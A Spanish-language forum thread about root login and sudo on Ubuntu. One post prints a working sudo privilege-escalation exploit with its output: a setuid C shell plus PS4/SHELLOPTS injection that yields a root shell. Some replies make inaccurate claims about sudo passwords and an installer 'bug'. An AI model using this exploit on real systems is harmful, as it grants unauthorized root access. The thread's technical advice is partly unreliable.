Login root

[JoRgE-1987]

En modo consola, si pones sudo -s , te pide la pass de root, que es por defecto, la misma que la del primer usuario, que te pide ubuntu que crees en la instalacion.
De todas maneras, siendo root, o usuario administrador, basta con poner passwd, y te dice que ingreses la nueva contraseña para root, para que deje de ser la misma que la del user admin.

Saludos :D

[jf0]

Pero porque no es aconsejable? Se supone que la interface grafica es tan fiel como su equivalente en consola, por lo que no logro entender porque seria una mala practica.

Basicamente el habito de loguearse como root(on-line) en consola o en las X es considerado un mal por una sencialla razon, se corre un alto riesgo de que se este ejecutando algun programa(no solo demonios como X) que sean vulnerables a ataques.

Por otro lado (y corrijanme si me equivoco) creo que darle la posibilidad a cualquier usuario de ser superusuario (por 15 min) es muy peligroso. Si tan solo anteponer sudo brinda tales privilegios, como se podria restringir al usuario comun? (no permitirle usar sudo al user comun, que solo el root, logueado por gui o consola pueda ser superusuario)

Tenes toda la razon en sentido, abajo paso a describir una causa.

En modo consola, si pones sudo -s , te pide la pass de root, que es por defecto, la misma que la del primer usuario, que te pide ubuntu que crees en la instalacion.

Bueno principalmente yo, que no significa que todo el mundo lo tenga que hacer, dejaria de usar 'su' o 'sudo'. Sencillamente porque la siguiente razon:

¡¡¡TIENE SUS LINDOS BUGS!!!

Aca tienen un  ejemplo de un bug para escalar privilegios usando sudo:

Código

%cat x.sh
#!/bin/bash -x
 
echo "Getting root!!"
%
##
 
##
# cat /etc/sudoers
...
breno ALL=(ALL) /home/breno/x.sh
..
#
 
## Let's use an egg shell :)
%cat egg.c
 
#include <stdio.h>
 
int main()
{
setuid(0);
system("/bin/sh");
}
%
 
% gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 &#39;$(chown root:root egg)&#39;
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x 1 root root 7428 2005-11-09 13:54 egg
% setenv PS4 &#39;$(chmod +s egg)&#39;
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
sh-3.00#

Me despido.
Saludos a todos!

P.D: CID, al fin postee algo  , ¿ya salde la cuenta de uso del canal?.

[CID]

Basicamente el habito de loguearse como root(on-line) en consola o en las X es considerado un mal por una sencialla razon, se corre un alto riesgo de que se este ejecutando algun programa(no solo demonios como X) que sean vulnerables a ataques.

Entonces lo ideal seria loguearse en modo consola, antes de arrancar el modo grafico. Siendo uno solo el proceso que está corriendo, a esto lo podriamos dejar para otro post, el como se hace y demás.

P.D: CID, al fin postee algo  , ¿ya salde la cuenta de uso del canal?.

bueno... dejame ver... considerando los intereses y el valor del dolar... sin olvidar que el euro está de moda....

[JoRgE-1987]

Gracias jf0 por las correcciones, y los consejos, y el exploit tambien, muejejeje,

FrmDevs.Offtopic := True;

A raiz de leer y consignar todo esto, poniendome a pensar, en si usar windows, o GNU/Linux, eh llegado a una conclucion, la cual es la siguiente:

No prendo nunca mas la pc, es una m****, ya fue, me canse de los bugs, los virus, los popups, los hackers, los crackers, los lammers, los newbies, los wikis, me canse de todo, voy a tirar la pc (Definicion de PC: Personal'mente una c*****) a la m****, y me voy a hacer panadero.
¿Que, no me digas que tengo que conectar el horno a internet, para que baje actualizaciones, porque funciona con windows CE, que no queda nada sin un sistema informatico conectado a internet en el mundo?

FrmDevs.Offtopic := False;

Saludos :D

PD: Me parece un buen tema para debatir algun dia.

[TolaWare]

Sucede que desde entorno de ventana cree el usuario root perteneciente al grupo adm.

En la instalación de ubuntu existe un bug. Te dice que crees un usuario, pero no te dice que sea el root, por lo que uno crea una cuenta normal. La solución (en esa etapa) es crear un usuario con nombre root y contraseña a gusto. Posteriormente crear los demás usuarios usando la cuenta de root.
Pero cuando lo instalé no conocia ese bug, por lo que cree el usuario pepito y le puse clave juanito.

Ya se que si antepongo sudo a los comandos tengo privilegios de root. Pero nunca me gustó esa caracteristica.
Por lo que cree el usuario root como mencioné anteriormente (en entorno de ventana). Para crearlo se me pidio ingresar la clave del usuario pepito, asi pude crear al administrador (mala filosofia no?...). Asi que la cuenta existe y la clave, o mejor dicho, el login es correcto. Por ese motivo me dice al querer iniciar sesion que el root desde esa ventana no deberia loguearse, en ningun momento me dice que el login fracasa por user o pw incorrectos.

No es bug, esot esta hecho asi, para que no entren de una como root, y hagan macanas con el PC luego de instalar ubuntu

[CID]

No es bug, esot esta hecho asi, para que no entren de una como root, y hagan macanas con el PC luego de instalar ubuntu

No es por llevar la contra, pero supongamos que no sea un bug... que sentido tiene si despues un usuario comun obtiene privilegios de root con tal solo usar sudo

PD: pasa el tiempo y todavia no comprendo esa implementación. Igual es el unico linux que aún sigue en mi poderosa celeron 333 (y eso que los sistemas no duran mucho en ella eh )